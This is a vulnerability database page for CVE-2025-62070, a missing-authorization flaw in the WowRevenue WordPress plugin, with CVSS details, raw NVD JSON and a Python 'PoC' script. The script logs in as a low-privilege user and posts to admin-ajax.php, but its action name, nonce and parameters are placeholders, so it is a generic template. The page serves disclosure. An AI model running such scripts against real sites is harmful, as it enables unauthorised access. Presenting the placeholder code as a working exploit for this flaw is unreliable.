Security Vulnerability Report
中文
CVE-2025-62070 CVSS 4.3 MEDIUM

CVE-2025-62070

Published: 2025-10-22 15:16:06
Last Modified: 2026-04-27 18:16:25

Description

Missing Authorization vulnerability in WPXPO WowRevenue revenue.This issue affects WowRevenue: from n/a through <= 1.2.13.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WowRevenue <= 1.2.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62070 PoC - WowRevenue Authorization Bypass # Target: WordPress site with WowRevenue plugin <= 1.2.13 target_url = "http://target-wordpress-site.com" wp_user = "subscriber_user" wp_pass = "user_password" # Step 1: Authenticate and get nonce session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": wp_user, "pwd": wp_pass, "wp-submit": "Log In" } session.post(login_url, data=login_data) # Step 2: Exploit authorization bypass # Replace 'action_endpoint' and 'malicious_params' with actual vulnerable endpoint exploit_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { "action": "wowrevenue_vulnerable_action", "_wpnonce": "attacker_nonce", "param1": "value1" } response = session.post(exploit_url, data=exploit_data) print(f"Response Status: {response.status_code}") print(f"Response: {response.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62070", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:05.853", "lastModified": "2026-04-27T18:16:25.377", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPXPO WowRevenue revenue.This issue affects WowRevenue: from n/a through <= 1.2.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/revenue/vulnerability/wordpress-wowrevenue-plugin-1-2-13-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}